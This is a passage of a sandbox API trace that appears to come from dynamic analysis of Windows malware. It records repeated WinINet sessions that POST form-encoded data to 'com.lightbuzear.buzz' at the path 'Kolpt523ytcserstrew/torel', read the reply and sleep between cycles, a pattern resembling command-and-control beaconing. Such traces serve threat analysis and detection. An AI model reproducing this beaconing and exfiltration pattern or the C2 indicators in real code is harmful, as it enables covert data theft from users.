RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815680 [0234.035] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0234.035] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48157d0 [0234.035] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815680 | out: hHeap=0x4780000) returned 1 [0234.035] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0234.035] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157d0 | out: hHeap=0x4780000) returned 1 [0234.035] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48157d0 [0234.035] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303e0 [0234.036] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48303e0 | out: hHeap=0x4780000) returned 1 [0234.036] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0234.036] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303e0 [0234.036] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0234.036] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830688 [0234.036] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0234.036] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0234.036] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0234.036] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0234.036] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0234.036] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0234.036] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0234.036] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0234.037] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0234.037] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48156f8 [0234.037] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0234.037] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48157e8 [0234.037] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156f8 | out: hHeap=0x4780000) returned 1 [0234.037] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0234.037] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157e8 | out: hHeap=0x4780000) returned 1 [0234.037] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48157e8 [0234.037] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48308e0 [0234.037] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48308e0 | out: hHeap=0x4780000) returned 1 [0234.037] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0234.037] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0234.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0234.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0234.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0234.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0234.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0234.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0234.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0234.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0234.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0234.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815608 [0234.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0234.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815638 [0234.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0234.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0234.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0234.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48306b0 [0234.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0234.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0234.039] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0234.039] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48304d0 [0234.039] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0234.039] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48307c8 [0234.039] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0234.039] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0234.040] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0234.040] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0234.040] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48307c8 | out: hHeap=0x4780000) returned 1 [0234.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0234.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0234.040] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0234.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0234.040] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0234.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0234.041] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0234.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0234.041] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0234.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48156f8 [0234.041] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0234.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815608 [0234.041] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156f8 | out: hHeap=0x4780000) returned 1 [0234.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0234.041] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0234.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48308b8 [0234.041] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0234.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0234.041] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48308b8 | out: hHeap=0x4780000) returned 1 [0234.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830980 [0234.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0234.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830930 [0234.042] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0234.064] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0234.065] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0234.065] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0235.283] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830930 | out: hHeap=0x4780000) returned 1 [0235.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0235.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0235.284] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0235.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0235.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0235.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0235.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0235.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0235.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0235.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0235.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0235.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0235.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48156f8 [0235.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0235.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815638 [0235.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156f8 | out: hHeap=0x4780000) returned 1 [0235.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0235.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0235.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830610 [0235.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0235.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0235.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830610 | out: hHeap=0x4780000) returned 1 [0235.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830890 [0235.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0235.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48307f0 [0235.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0235.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0235.286] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0235.286] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0235.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48307f0 | out: hHeap=0x4780000) returned 1 [0235.287] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0235.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0235.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0235.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0235.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0235.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0235.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0235.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0235.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0235.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0235.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815530 [0235.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0235.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815638 [0235.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815530 | out: hHeap=0x4780000) returned 1 [0235.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0235.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0235.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830610 [0235.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0235.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0235.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830610 | out: hHeap=0x4780000) returned 1 [0235.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830728 [0235.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0235.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48308b8 [0235.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0235.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0235.289] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0235.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0235.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48308b8 | out: hHeap=0x4780000) returned 1 [0235.290] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0235.290] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0235.290] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0235.290] FreeLibrary (hLibModule=0x71570000) returned 1 [0235.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0235.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0235.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830688 | out: hHeap=0x4780000) returned 1 [0235.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48303e0 | out: hHeap=0x4780000) returned 1 [0235.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830318 | out: hHeap=0x4780000) returned 1 [0235.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0235.314] Sleep (dwMilliseconds=0x2710) [0235.326] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0235.326] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0235.326] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0235.326] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0235.326] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0235.326] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0235.326] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0235.326] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0235.326] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0235.326] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0235.326] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0235.326] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815530 [0235.327] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0235.327] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0235.327] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815530 | out: hHeap=0x4780000) returned 1 [0235.327] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48155f0 [0235.327] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0235.327] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0235.327] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0235.327] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0235.327] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0235.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0235.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0235.328] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0235.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0235.328] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0235.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0235.328] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0235.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0235.328] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0235.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815530 [0235.328] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0235.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815560 [0235.328] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815530 | out: hHeap=0x4780000) returned 1 [0235.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0235.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0235.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830318 [0235.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0235.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0235.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830318 | out: hHeap=0x4780000) returned 1 [0235.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830318 [0235.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0235.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303e0 [0235.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0235.330] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0235.330] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0235.330] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0235.330] FreeLibrary (hLibModule=0x71780000) returned 1 [0235.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48303e0 | out: hHeap=0x4780000) returned 1 [0235.331] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0235.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303e0 [0235.331] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0235.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0235.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0235.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0235.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0235.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0235.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0235.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0235.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0235.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0235.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815740 [0235.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0235.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48156f8 [0235.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815740 | out: hHeap=0x4780000) returned 1 [0235.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0235.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156f8 | out: hHeap=0x4780000) returned 1 [0235.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815740 [0235.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48307c8 [0235.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48307c8 | out: hHeap=0x4780000) returned 1 [0235.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0235.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830818 [0235.334] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0235.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830908 [0235.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0235.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0235.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0235.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0235.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0235.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0235.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0235.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0235.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0235.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815788 [0235.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0235.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815530 [0235.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815788 | out: hHeap=0x4780000) returned 1 [0235.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, 